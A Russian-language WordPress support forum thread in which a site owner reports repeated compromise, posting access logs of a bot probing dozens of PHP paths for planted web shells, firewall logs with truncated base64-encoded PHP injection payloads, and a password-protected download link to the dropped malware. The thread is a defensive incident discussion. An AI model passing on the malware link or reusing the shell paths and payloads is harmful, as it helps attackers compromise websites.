Поддержка Проблемы и решения Перманентный взлом

Перманентный взлом

  • jobmail

    (@jobmail)


    8 лет, 7 месяцев назад

    Вот так стучится бот:

    198.71.59.117 - - [20/Aug/2015:00:16:00 +0300] "POST /wp-content/uploads/ms/view.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:01 +0300] "POST /wp-content/uploads/mgd/xmlrpcS0V.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:02 +0300] "POST /wp-content/uploads/ne/utf.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:02 +0300] "POST /wp-content/uploads/2012/07/guestbookVaV.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:03 +0300] "POST /wp-content/uploads/admlast.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:04 +0300] "POST /wp-content/uploads/vbv/title.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:05 +0300] "POST /wp-content/uploads/2014/02/object.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:06 +0300] "POST /wp-content/uploads/aj/header.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:07 +0300] "POST /wp-content/uploads/2014/02/backup.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:07 +0300] "POST /wp-content/uploads/2012/info.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:08 +0300] "POST /wp-content/uploads/ayv/template.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:09 +0300] "POST /wp-content/uploads/ne/admin.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:10 +0300] "POST /wp-content/uploads/2014/08/press.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:11 +0300] "POST /wp-content/uploads/2014/07/option.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:12 +0300] "POST /wp-content/uploads/ne/test.php HTTP/1.0" 404 3063 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:12 +0300] "POST /wp-content/uploads/qw/dir.php HTTP/1.0" 404 3058 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:13 +0300] "POST /wp-content/uploads/2014/03/test.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:14 +0300] "POST /wp-content/uploads/bj/article.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
178.137.90.21 - - [20/Aug/2015:00:16:15 +0300] "GET /administrator/index.php HTTP/1.0" 200 4547 "-" "-"
198.71.59.117 - - [20/Aug/2015:00:16:15 +0300] "POST /wp-content/uploads/hdy/info.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
178.137.90.21 - - [20/Aug/2015:00:16:15 +0300] "POST /administrator/index.php HTTP/1.0" 303 26 "-" "-"
178.137.90.21 - - [20/Aug/2015:00:16:15 +0300] "GET /administrator/index.php HTTP/1.0" 200 2065 "-" "-"
198.71.59.117 - - [20/Aug/2015:00:16:16 +0300] "POST /wp-content/uploads/ccs/dirs.php HTTP/1.0" 404 3058 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:17 +0300] "POST /wp-content/themes/twentyten/sidebar.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:17 +0300] "POST /wp-content/plugins/xcalendar/xcalendar.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:18 +0300] "POST /wp-pass.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:19 +0300] "POST /wp-content/themes/twentythirteen/sidebar.php HTTP/1.0" 500 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:20 +0300] "POST /wp-content/uploads/gqy/cache.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:21 +0300] "POST /wp-includes/theme-compat/header.php HTTP/1.0" 500 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:22 +0300] "POST /wp-content/themes/twentythirteen/archive.php HTTP/1.0" 500 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:23 +0300] "POST /wp-content/themes/twentyten/index.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:24 +0300] "POST /wp-includes/session.php HTTP/1.0" 200 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:25 +0300] "POST /wp-content/themes/twentyeleven/sidebar-page.php HTTP/1.0" 500 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:26 +0300] "POST /wp-includes/class-wp-editor.php HTTP/1.0" 200 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:26 +0300] "POST /wp-content/themes/twentyeleven/content-single.php HTTP/1.0" 500 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:27 +0300] "POST /wp-content/uploads/gqy/.1634dd.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:28 +0300] "POST /wp-content/uploads/vbv/info.php HTTP/1.0" 404 3059 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:29 +0300] "POST /wp-content/uploads/2014/02/templist.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:30 +0300] "POST /wp-content/uploads/wl/proxy.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:31 +0300] "POST /wp-includes/SimplePie/Author.php HTTP/1.0" 200 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:31 +0300] "POST /wp-includes/SimplePie/Category.php HTTP/1.0" 200 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:32 +0300] "POST /wp-content/model.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:33 +0300] "POST /wp-includes/images/smilies/page.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:34 +0300] "POST /wp-content/uploads/page.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:35 +0300] "POST /wp-content/themes/twentyfifteen/article.php HTTP/1.0" 404 3059 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:35 +0300] "POST /wp-content/themes/twentyfourteen/images/global.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:36 +0300] "POST /wp-content/themes/twentythirteen/js/user.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:37 +0300] "POST /wp-includes/js/imgareaselect/proxy.php HTTP/1.0" 404 3058 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:38 +0300] "POST /wp-content/uploads/ms/sql.php HTTP/1.0" 404 3058 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:39 +0300] "POST /wp-content/themes/twentyfifteen/css/dump.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:40 +0300] "POST /wp-includes/js/tinymce/plugins/paste/plugin.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:41 +0300] "POST /wp-includes/js/tinymce/plugins/wordpress/article.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:42 +0300] "POST /wp-includes/css/info.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:43 +0300] "POST /wp-includes/js/tinymce/plugins/compat3x/proxy.php HTTP/1.0" 404 3063 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:44 +0300] "POST /wp-includes/js/tinymce/plugins/lists/help.php HTTP/1.0" 404 3059 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:45 +0300] "POST /wp-content/uploads/2012/functions.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:45 +0300] "POST /wp-content/themes/twentythirteen/js/user.php HTTP/1.0" 200 993 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:46 +0300] "POST /wp-content/themes/twentythirteen/tag.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:47 +0300] "POST /wp-content/themes/twentyfourteen/inc/featured-content.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:48 +0300] "POST /wp-content/themes/twentytwelve/content.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:49 +0300] "POST /wp-content/themes/twentyfifteen/archive.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:49 +0300] "POST /wp-content/themes/twentyfifteen/index.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:50 +0300] "POST /wp-content/themes/twentyfifteen/search.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:51 +0300] "POST /wp-content/themes/twentythirteen/content-status.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:52 +0300] "POST /wp-content/themes/twentyeleven/sidebar-page.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:52 +0300] "POST /wp-content/themes/twentythirteen/functions.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:53 +0300] "POST /wp-content/themes/twentythirteen/author.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:54 +0300] "POST /wp-content/themes/index.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:55 +0300] "POST /wp-content/themes/twentyfourteen/index.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:55 +0300] "POST /wp-content/themes/twentythirteen/content-image.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:56 +0300] "POST /wp-content/themes/twentyfifteen/author-bio.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:57 +0300] "POST /wp-content/themes/twentythirteen/footer.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:58 +0300] "POST /wp-content/themes/twentyfourteen/inc/customizer.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:58 +0300] "POST /wp-content/themes/twentytwelve/sidebar.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
198.71.59.117 - - [20/Aug/2015:00:16:59 +0300] "POST /wp-content/themes/twentyfourteen/content-gallery.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    В результате чего все равно дропает кучу PHP в /wp-content. Там где он натыкается на 404 — это я уже почистил, за предыдущие 3-4 взлома 🙂 С помощью этой хрени рассылает кучу спама и используется в виде хостинга ссылок.

    Вот что дропает:
    https://www.virustotal.com/ru/file/bb15a692f22fa594a87d4da02f94daf334b5fb8ffc2c4c121d5005d363b0db8d/analysis/1440566877/

    Взять можно тут:
    https://cloud.mail.ru/public/7LDt/hiBphdJax
    Пароль 112233

Просмотр 12 ответов — с 1 по 12 (всего 12)
  • Автор jobmail

    (@jobmail)

    8 лет, 7 месяцев назад

    Поставил для него ловушку POST запросов, еще раз сломает — запишу как он это делает. Задолбал.

    Flector

    (@flector)

    8 лет, 7 месяцев назад

    а толку то?
    если вас уже взломали 3-4 раза, то сейчас бот не найдет своего шелла и заново вас взломает и снова зальет шелл.

    лечить надо не симптомы, а саму болезнь.

    Автор jobmail

    (@jobmail)

    8 лет, 7 месяцев назад

    Ломает через стандартные скрипты WordPress входящие в поставку. WordPress и есть болезнь 🙂

    Когда в журнале выше 500 ошибка, генерится файлик в структуре. А дальше уже через shell делает всякие гадости…

    Модератор Yui

    (@fierevere)

    永子

    8 лет, 7 месяцев назад

    можете показать запись с лога где 500 ошибка?

    и да, ваш .zip не распаковывается

    $ unzip hacking.wp.zip
Archive:  hacking.wp.zip
   skipping: hacking.wp.tar          need PK compat. v5.1 (can do v4.6)

    Flector

    (@flector)

    8 лет, 7 месяцев назад

    Ломает через стандартные скрипты WordPress входящие в поставку. WordPress и есть болезнь 🙂

    я в этом глубоко сомневаюсь.
    значит миллионы сайтов живут спокойно, а новые дырки находят хакеры только на вашем сайте. так что ли?

    если у вас последняя версия движка и плагинов, то хрен вас кто взломает (если, конечно, исключить взлом устаревшего серверного ПО).

    Модератор Yui

    (@fierevere)

    永子

    8 лет, 7 месяцев назад

    Flector, ко мне заходили эти гости, пробуют огромный набор эксплоитов, лог оставляют примерно на мегабайт, тыкаются везде где могут, ищут как скрипты, так и дыры непосредственно в PHP

    Вот у ТСа нашли чего-то и воспользовались

    Flector

    (@flector)

    8 лет, 7 месяцев назад

    тыкаются везде где могут, ищут как скрипты, так и дыры непосредственно в PHP

    да я и по логу уже понял, что там идет банальный перебор известных эксплойтов. и с последней версией wordpress они могут найти какую угодно дырку, но только не в движке. потому что это даже не разумный взлом — а тупейший авто-взлом без участия самого хакера.

    Автор jobmail

    (@jobmail)

    8 лет, 7 месяцев назад

    >можете показать запись с лога где 500 ошибка?

    В первом сообщение после HTTP/1.0 следующее число код ошибки. 200, 404, 500

    >и да, ваш .zip не распаковывается
    >need PK compat

    Вы забыли указать пароль в переменной -P, например, так:
    unzip -P 112233 hacking.wp.zip

    >я в этом глубоко сомневаюсь.

    Поверьте, ошибок в настройке хостинга нет, версия движка последняя, с правами все очень жестко. Благодаря этому очень быстро находятся файлики созданные www:www и удаляются. Выше папки /wp-content они поднятся не смогли, хотя очень пытались.

    По совету англоязычного форума поставил NinjaFirewall и прописал туда в начало перехват всех POST-запросов. Еще раз «стукнет», напишу что и как.

    Flector

    (@flector)

    8 лет, 7 месяцев назад

    еще раз — если «ошибок» нет, то вас взломать не могли.
    вас же даже не разумный хакер взламывает — запустили скрипт перебора известных эксполойтов и ломают. а раз взламывает через известные эксплойты — значит есть у вас дырявый софт на сайте. и уж точно не wordpress, если он последний.

    Модератор Yui

    (@fierevere)

    永子

    8 лет, 7 месяцев назад

    $ unzip -P 112233 hacking.wp.zip
Archive:  hacking.wp.zip
   skipping: hacking.wp.tar          need PK compat. v5.1 (can do v4.6)

$ unzip -V
UnZip 6.00 of 20 April 2009, by ALT Linux Team.  Original by Info-ZIP.

    198.71.59.117 — — [20/Aug/2015:00:16:21 +0300] «POST /wp-includes/theme-compat/header.php HTTP/1.0» 500 26
    это? ну навряд ли это непосредственно WP, скорее эксплуатация уязвимости PHP через него.

    итак, хотелось бы видеть phpinfo()

    Автор jobmail

    (@jobmail)

    8 лет, 7 месяцев назад

    Постучал :-))

    Вот логи NinjaFirewall:

    DATE         INCIDENT  LEVEL     RULE     IP            REQUEST
26/Aug/15 20:11:39  #1762326  medium     531  69.30.231.66     GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)]
26/Aug/15 21:09:56  #4058437  critical   360  64.31.29.188     POST /index.php - Shell/backdoor (a) - [POST:a = Php]
27/Aug/15 01:09:40  #6157366  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
27/Aug/15 06:55:02  #4794522  medium     531  37.157.193.84    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)]
27/Aug/15 07:07:11  #8613809  medium     531  193.164.216.238  GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)]
27/Aug/15 11:07:14  #3817059  info         -  192.168.1.10     POST /wp-login.php - Logged in user - [admin (administrator)]
27/Aug/15 13:00:13  #5227463  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
27/Aug/15 13:25:57  #4715688  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
27/Aug/15 14:36:34  #6332628  medium     531  108.59.8.70      GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)]
27/Aug/15 15:57:42  #1290706  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
27/Aug/15 16:11:20  #6182357  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
27/Aug/15 16:18:36  #4040097  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
27/Aug/15 16:30:59  #2767278  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/tag.php - base64-encoded injection - [POST:nf8ce7b = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:01  #7538106  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/functions.php - base64-encoded injection - [POST:n78cd5a = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:02  #5904709  critical     -  37.139.47.83     POST /wp-content/themes/twentytwelve/sidebar.php - base64-encoded injection - [POST:n7feb09 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:03  #6453220  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n55d3bf = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:04  #4232088  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:neb6d80 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:06  #6155168  critical     -  37.139.47.83     POST /wp-content/themes/twentyfourteen/inc/featured-content.php - base64-encoded injection - [POST:n491b4c = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:07  #1509132  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/author.php - base64-encoded injection - [POST:n725a1e = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:08  #3070642  critical     -  37.139.47.83     POST /wp-content/themes/twentyfourteen/content-gallery.php - base64-encoded injection - [POST:n272748 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:09  #8282241  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n3c60b2 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:11  #8446923  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:nf76775 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
